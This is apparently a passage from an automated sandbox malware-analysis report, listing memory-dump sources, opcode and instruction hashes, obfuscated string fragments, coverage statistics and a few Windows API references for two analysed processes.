                                                            • Instruction Fuzzy Hash: 401112B6D0121CAF9B00DFE9D9419EEB7F9EF49210F14416AE909E7200E7759A04CBE1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: L
                                                            • API String ID: 0-1331423761
                                                            • Opcode ID: de2cd38af876d28ea3ba09e5bffd043f3f6078b0483c65775d67ea22b5f08749
                                                            • Instruction ID: 0028dff49287054d0413dd1e3d64bc03c9aaf77a352464e1f8019c96e87fcd06
                                                            • Opcode Fuzzy Hash: de2cd38af876d28ea3ba09e5bffd043f3f6078b0483c65775d67ea22b5f08749
                                                            • Instruction Fuzzy Hash: 1111FEB6D0121CAF9B50DFE9DD419EEBBF9EF48210F14456AE919E7200E7745A048BA0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bd0e62b92b572c76d56d7b34eccc94ad5fc6bfe904389b2352d80dc92fe27d58
                                                            • Instruction ID: b155931af351b680ea38952430349e526454b6ec303c555acd2ddcab986fc40c
                                                            • Opcode Fuzzy Hash: bd0e62b92b572c76d56d7b34eccc94ad5fc6bfe904389b2352d80dc92fe27d58
                                                            • Instruction Fuzzy Hash: 6C410EB1D11218AFDB04CF99CC81AEEBBBCFF49710F10415AF918EA240E7B49641CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                            • Instruction ID: 6c7678dc7237338d386c32f17c7900f6af780b8245321539f8a3c759d427059f
                                                            • Opcode Fuzzy Hash: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                            • Instruction Fuzzy Hash: 8531D8B5A01648AFDB54DF99D980EEEB7F9EF8C310F108619F919A7340D730A941CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                            • Instruction ID: 220e7792f6c62b9daccef64184b0466f4ff893c81647cde6e04df4c65e228758
                                                            • Opcode Fuzzy Hash: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                            • Instruction Fuzzy Hash: C531EE75A00208AFDB14DF99D940EEF77B9EF88710F10821AFD18A7341D774A911CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf6ed1507c048202a8380901b20853abf16bc6de9ff7b6f9047b8a115ef48fb3
                                                            • Instruction ID: 12962e26c988309b89c0392dbfe45f8ddcba0e35f2916ab43b63ae03b8fd1c78
                                                            • Opcode Fuzzy Hash: cf6ed1507c048202a8380901b20853abf16bc6de9ff7b6f9047b8a115ef48fb3
                                                            • Instruction Fuzzy Hash: B131FCB5A00609AFDB14DF59DD41EEFB7B9EF88300F10861AF918A7341E774A911CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d70121d21914185a18db6d01ed80ca7d508067f521cbbc7796229021d8daec4
                                                            • Instruction ID: 091015cea0b579901a7a4b372f6130feeb84279305ce348003f197d3bbef0d8f
                                                            • Opcode Fuzzy Hash: 5d70121d21914185a18db6d01ed80ca7d508067f521cbbc7796229021d8daec4
                                                            • Instruction Fuzzy Hash: 82210CB5A00609AFDB14DF58DD41EAB77B8EF88700F10851AF918AB341E775A911CBA1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 25b18df5678153bc5923fa7573696ab297a4478d8ab3a4e71ffa8f91d7ab67c5
                                                            • Instruction ID: 8af8cc657d3fa1ed6d5172f46da4dfd8de87afb54ae1b255972bf465d42afef0
                                                            • Opcode Fuzzy Hash: 25b18df5678153bc5923fa7573696ab297a4478d8ab3a4e71ffa8f91d7ab67c5
                                                            • Instruction Fuzzy Hash: 7011C2B63803047BF320EE158C83FAB775C9B95B50F248016FB08AE2C1E6A4F80547B4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9be72a19c9e0245c2c1c8c785e6486e1502920fbd8a387ee8b81c49a71c6fc8e
                                                            • Instruction ID: bf630dd1156069045427de11f15a8ea3b824944f0845a172cc9a06c9d42e7302
                                                            • Opcode Fuzzy Hash: 9be72a19c9e0245c2c1c8c785e6486e1502920fbd8a387ee8b81c49a71c6fc8e
                                                            • Instruction Fuzzy Hash: 3111257254A385DFEB11CBBCE844397BBA8EF66220F28129FF9898E081D3358056C751
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 46a6bf4ad95f33546e795f44d6ff258994b1487d7f7f38bc391b9097c11bbe26
                                                            • Instruction ID: 741fba5f2fd0fdfb980e4bdf74896668067a872978a1ba7dbbc83bca6385d58e
                                                            • Opcode Fuzzy Hash: 46a6bf4ad95f33546e795f44d6ff258994b1487d7f7f38bc391b9097c11bbe26
                                                            • Instruction Fuzzy Hash: 8A118E75A01304AFE720EF68CD45FEBB3ACEF85700F10461EF9186B241EB756A058BA0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8cf869b84da2e677cde3e514bf77ca522b6e9b483428207a7ca8a5e1cae373bf
                                                            • Instruction ID: de351a016bf147bfd24a9e3d3636f702c627dec9209062e253684df41d229752
                                                            • Opcode Fuzzy Hash: 8cf869b84da2e677cde3e514bf77ca522b6e9b483428207a7ca8a5e1cae373bf
                                                            • Instruction Fuzzy Hash: 12116075A01704AFE720EF64CD45FEB73ACEF84700F10461EF9196B281EB756A058BA1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63f63e8f999b740cdbb74f0d65ac6bcd4b1d7f17212a4d24cebee56a7f62101b
                                                            • Instruction ID: fdecc9b01dc6ddec913b9b5aee50b589861811c8baaedb0e6a4f03a634cc3f50
                                                            • Opcode Fuzzy Hash: 63f63e8f999b740cdbb74f0d65ac6bcd4b1d7f17212a4d24cebee56a7f62101b
                                                            • Instruction Fuzzy Hash: 7601D6BAA003143BD710EB94CC85DEBB36CEF55210F040296FD589B341FA74AE5547E1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf8634709f6c80726a39731a647e1e53174cbad21379e31965701261575007c2
                                                            • Instruction ID: 922f6d6a99930d808ed120fbd3d0e1d42d67eda4bbbc0b4b7cd3a6b70bedebb0
                                                            • Opcode Fuzzy Hash: cf8634709f6c80726a39731a647e1e53174cbad21379e31965701261575007c2
                                                            • Instruction Fuzzy Hash: 4A1196B1D11229AF8B44CFA9988559EBBF8FA09620F14815FF818EA210D37596518FD0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                            • Instruction ID: 2e4ef44c3d6b7a885084050521c648e5bb06d3636e19e8579d3ea4c81f5b32e9
                                                            • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                            • Instruction Fuzzy Hash: F601CCB2200208BFCB14DE8DDC80EEB77ADAF8C710F408209BA09E7241D630F8518BA4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 11c40870e9ae16489f822b08ea30bc392231aef0b6716b2cc5a8eb4801c81416
                                                            • Instruction ID: f9c18eb5087eff4554d67227a1bbcf3a21f4ebc06d0a7b708e042e5d4178fb56
                                                            • Opcode Fuzzy Hash: 11c40870e9ae16489f822b08ea30bc392231aef0b6716b2cc5a8eb4801c81416
                                                            • Instruction Fuzzy Hash: 29F08273604216ABD7109B5DEC84B8BF79CEB99234F240227FD1C9A281E676E45183A0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 25ecb6bf2a448980e5a57064e2dd1879b49d137cb7a586a0f03e4685d1d0a6e8
                                                            • Instruction ID: e9bcb78238e0fc7c42f321d848a2bcc378a25907c8e2e83455607e7db46a32c6
                                                            • Opcode Fuzzy Hash: 25ecb6bf2a448980e5a57064e2dd1879b49d137cb7a586a0f03e4685d1d0a6e8
                                                            • Instruction Fuzzy Hash: 85F096B59103187DDB10EBA4DD45EEA77389F84710F10838AE8096B281F6754A498B69
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4691c96d8d81143b437ca4f97799bd03263fa4e70748146f5b0961e75674bf37
                                                            • Instruction ID: bee376d039dc4ed1c683529613f108e6d547dbabfce986ccf9188286fd5034de
                                                            • Opcode Fuzzy Hash: 4691c96d8d81143b437ca4f97799bd03263fa4e70748146f5b0961e75674bf37
                                                            • Instruction Fuzzy Hash: A7F01C762042047FDB10DF99DD81E9B77ACEFC8750F00850AFA18A7241D770B9158BB0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Strings
                                                            • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                            • API String ID: 0-1002149817
                                                            Strings
                                                            • String ID: $2$>3$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                            • API String ID: 0-3810730746
                                                            Strings
                                                            • String ID: $=$($8^$=$L7$O5$Z$[$[$]$d&$fX$k^$q$y$}$4
                                                            • API String ID: 0-2955521445
                                                            Strings
                                                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                            • API String ID: 0-392141074
                                                            Strings
                                                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                            • API String ID: 0-392141074
                                                            Strings
                                                            • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$Z\XA\Y$\Y$^V^Y$o
                                                            • API String ID: 0-1090279348
                                                            Strings
                                                            • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$Z\XA\Y$\Y$^V^Y$o
                                                            • API String ID: 0-1090279348
                                                            Strings
                                                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                            • API String ID: 0-685823316
                                                            Strings
                                                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                            • API String ID: 0-685823316
                                                            Strings
                                                            • String ID: :$:$:$A$I$N$P$m$s$t
                                                            • API String ID: 0-2304485323
                                                            Strings
                                                            • String ID: .$P$e$i$m$o$r$x
                                                            • API String ID: 0-620024284
                                                            Strings
                                                            • String ID: .$P$e$i$m$o$r$x
                                                            • API String ID: 0-620024284
                                                            Strings
                                                            • String ID: L$S$\$a$c$e$l
                                                            • API String ID: 0-3322591375
                                                            Strings
                                                            • String ID: F$P$T$f$r$x
                                                            • API String ID: 0-2523166886
                                                            Strings
                                                            • String ID: F$P$T$f$r$x
                                                            • API String ID: 0-2523166886
                                                            Strings
                                                            • String ID: C$Z$[$`$f$p
                                                            • API String ID: 0-518084781
                                                            • Opcode ID: ce34b63da57df3aa10a4e5694d9c1efd90943e76aa992db27115448b1e3b0fe3
                                                            • Instruction ID: 8f1dd12d98b00b89b904378c1da147c463c2287c65c41abbb7be41601d9f6106
                                                            • Opcode Fuzzy Hash: ce34b63da57df3aa10a4e5694d9c1efd90943e76aa992db27115448b1e3b0fe3
                                                            • Instruction Fuzzy Hash: 4511DB20D087CEDDDB12C6BC84146AEBF715F23224F0883D9D9A52B2D2D2794716D7A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $i$l$o$u
                                                            • API String ID: 0-2051669658
                                                            • Opcode ID: ac245bbb8fef34ca08ee8a0a2085b8f9dc3aa41becb5ed50aa3959b3347dc62f
                                                            • Instruction ID: e7a0fd9a4f971a2de79e6530f4a05e2e8ce9534530f7eb253fcfe801c2dfc031
                                                            • Opcode Fuzzy Hash: ac245bbb8fef34ca08ee8a0a2085b8f9dc3aa41becb5ed50aa3959b3347dc62f
                                                            • Instruction Fuzzy Hash: B7613CB6900308AFDB24DBA4DC80FEFB7FDAB88710F14455DE559A7240EB35AA45CB60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $i$l$o$u
                                                            • API String ID: 0-2051669658
                                                            • Opcode ID: 9aadd20ca09918a20065aa89da7d12a8e1526951e9da892c301a092102ebb2ff
                                                            • Instruction ID: 7468ea12439b5398ac9312537035cc96f2b4446c7794d5e041ecc3aafb118cab
                                                            • Opcode Fuzzy Hash: 9aadd20ca09918a20065aa89da7d12a8e1526951e9da892c301a092102ebb2ff
                                                            • Instruction Fuzzy Hash: 0D4109B5900308AFDB20DFA4DC84FEFBBF9AB48700F104559E559AB240E775AA45CB60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$k$o
                                                            • API String ID: 0-3624523832
                                                            • Opcode ID: 7ed2013f33c7443f5a17a214e74812ffc78b8b754efadb3e995bc0177c4c79b3
                                                            • Instruction ID: 641b2c5afae66224d4761dd078d672003b693fc3239ecf20bad80cd9e029e860
                                                            • Opcode Fuzzy Hash: 7ed2013f33c7443f5a17a214e74812ffc78b8b754efadb3e995bc0177c4c79b3
                                                            • Instruction Fuzzy Hash: 7FB12AB6A00309AFDB24DBA4DC84FEFB7BDAF88700F14855DF659A7240D674AA41CB50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$h$o
                                                            • API String ID: 0-3662636641
                                                            • Opcode ID: 9091d2b4f7965116894649d74a519db72ecc851b061c234f20d2fad07d067166
                                                            • Instruction ID: 06e5645be220e575ccbd3c6f8bbc79731585029a90d0ce79c7cb24e70763b0f0
                                                            • Opcode Fuzzy Hash: 9091d2b4f7965116894649d74a519db72ecc851b061c234f20d2fad07d067166
                                                            • Instruction Fuzzy Hash: 218152B68012187ADB25EB90CD85FEFB37CBF48700F44859FE509AA141EB745B498FA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$k$o
                                                            • API String ID: 0-3624523832
                                                            • Opcode ID: 1905cef126baac4c665e76a0e5284e2342bf9e43182b30b192713a6dc671beb0
                                                            • Instruction ID: 3661eb1624ded4a523425b575460c284371ca810bf1177e0f5620148a6c7dead
                                                            • Opcode Fuzzy Hash: 1905cef126baac4c665e76a0e5284e2342bf9e43182b30b192713a6dc671beb0
                                                            • Instruction Fuzzy Hash: 8D613CB5A00309AFDB24DFA4DC84FEFB7BDAF88700F144559E6599B240DB35AA41CB60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                            • API String ID: 0-2877786613
                                                            • Opcode ID: 68c6be0a5652bd195a9cb4bd804981698cb68b864359a1e369fef82b6676bac5
                                                            • Instruction ID: 7a9850af032e0ec8fcd8f0db9398dc35dee896b159ad9de72cb552a8db1c9686
                                                            • Opcode Fuzzy Hash: 68c6be0a5652bd195a9cb4bd804981698cb68b864359a1e369fef82b6676bac5
                                                            • Instruction Fuzzy Hash: E7417EB5911658BEEB01EF90CD42FFF7B7CAF55704F00414AFA046A281E7746B0987A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                            • API String ID: 0-2877786613
                                                            • Opcode ID: 8aa529fe588887f0d8df0f6d35d7aa4efa76b3ea07955779a08ced1042b85981
                                                            • Instruction ID: 24229dbca47afff229455f28c4c36578f212e92cf4b1b9dca46a91eed7ee4e9f
                                                            • Opcode Fuzzy Hash: 8aa529fe588887f0d8df0f6d35d7aa4efa76b3ea07955779a08ced1042b85981
                                                            • Instruction Fuzzy Hash: BE317EB5911658BEEB01EF90CD42FFF7B7CAF55704F00414AFA04AA281E7746B0987A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$h$o
                                                            • API String ID: 0-3662636641
                                                            • Opcode ID: de8336d6e7b8a9d3990493c2b610c7c7e449cdead3cb6e8c84fd3fa7f7d11627
                                                            • Instruction ID: f110de40bccfaca07c415acb9f25b2750f00523d88cff88f4e001607635160e1
                                                            • Opcode Fuzzy Hash: de8336d6e7b8a9d3990493c2b610c7c7e449cdead3cb6e8c84fd3fa7f7d11627
                                                            • Instruction Fuzzy Hash: 544142B5D01318AADB20EF64CD44FEEB378FF48700F04859AE50DAA240EB745B888F95
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2$3$7$l
                                                            • API String ID: 0-1672800730
                                                            • Opcode ID: f6a67dba33d12b8fb8415ec1013720264c4e82e676b7512e808a929d760b7ca5
                                                            • Instruction ID: 9a7287206ee31a9136e62bb48e4e2ce7471bc620fe98ea69ff7ebd2fda7e8980
                                                            • Opcode Fuzzy Hash: f6a67dba33d12b8fb8415ec1013720264c4e82e676b7512e808a929d760b7ca5
                                                            • Instruction Fuzzy Hash: 8D3134B5A11209BBDB14DF94CD41FFEB7B8FF14304F044199E908AB241E775AA058BE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$k$o
                                                            • API String ID: 0-3624523832
                                                            • Opcode ID: d846e5e1f6de2c3ca1d7da4e9721de2f0c8fb86d22d2dfc56f871dd82193f03c
                                                            • Instruction ID: bd0a46c60ed3358457e862c78082ff488f296bb72e969706e88979e097ef4710
                                                            • Opcode Fuzzy Hash: d846e5e1f6de2c3ca1d7da4e9721de2f0c8fb86d22d2dfc56f871dd82193f03c
                                                            • Instruction Fuzzy Hash: 2E11E7B6900308ABCB14DFA4DC84ADEBBB9FF09714F04825EE9195F202E371D508CBA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$k$o
                                                            • API String ID: 0-3624523832
                                                            • Opcode ID: 92e3829bf4d7beda889854947f3e1fe7129153f5eed0d2d2d455c509ec4f0535
                                                            • Instruction ID: 7972559b80a5b9ea56410c2bc1bd0366e0038e088702561460408339fcc88999
                                                            • Opcode Fuzzy Hash: 92e3829bf4d7beda889854947f3e1fe7129153f5eed0d2d2d455c509ec4f0535
                                                            • Instruction Fuzzy Hash: 080184B2900318ABDB14DF98D884ADEF7B9FF08714F04825EE9195B201E771D549CBA0

                                                            Execution Graph

                                                            Execution Coverage:2.6%
                                                            Dynamic/Decrypted Code Coverage:4.3%
                                                            Signature Coverage:2.5%
                                                            Total number of Nodes:437
                                                            Total number of Limit Nodes:71

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ")$#$#$$u$'$-$-~$.$@k$H$O($T$Z/$[5$]5$f?$pa$r$vj$}$K
                                                            • API String ID: 0-3922967351
                                                            • Opcode ID: caf37acd659b303d8658ef6739fe705919f6c318ef4444487542019a5517ea90
                                                            • Instruction ID: 7885fe15e6da677c77cd9e7e1ad8eb52a6c58cc6f6774a086a1a441ab83e0bed
                                                            • Opcode Fuzzy Hash: caf37acd659b303d8658ef6739fe705919f6c318ef4444487542019a5517ea90
                                                            • Instruction Fuzzy Hash: B7228EB0D0522DCBEB24CF85C994BEDBBB2BB44308F2081D9C10D6B285D7B56A89DF55
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0070C5C4
                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0070C5FF
                                                            • FindClose.KERNELBASE(?), ref: 0070C60A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                            • Instruction ID: db3d37a724fe4ddce1f7425545e96891d6be8ad32b19036de2c33be27e2df3d0
                                                            • Opcode Fuzzy Hash: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                            • Instruction Fuzzy Hash: 153185B5500248FBEB21DBA4CC85FFB77BC9B44744F144658F908A61C0DB74AA848BA0
                                                            APIs
                                                            • NtCreateFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?,?,?), ref: 007191A1
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
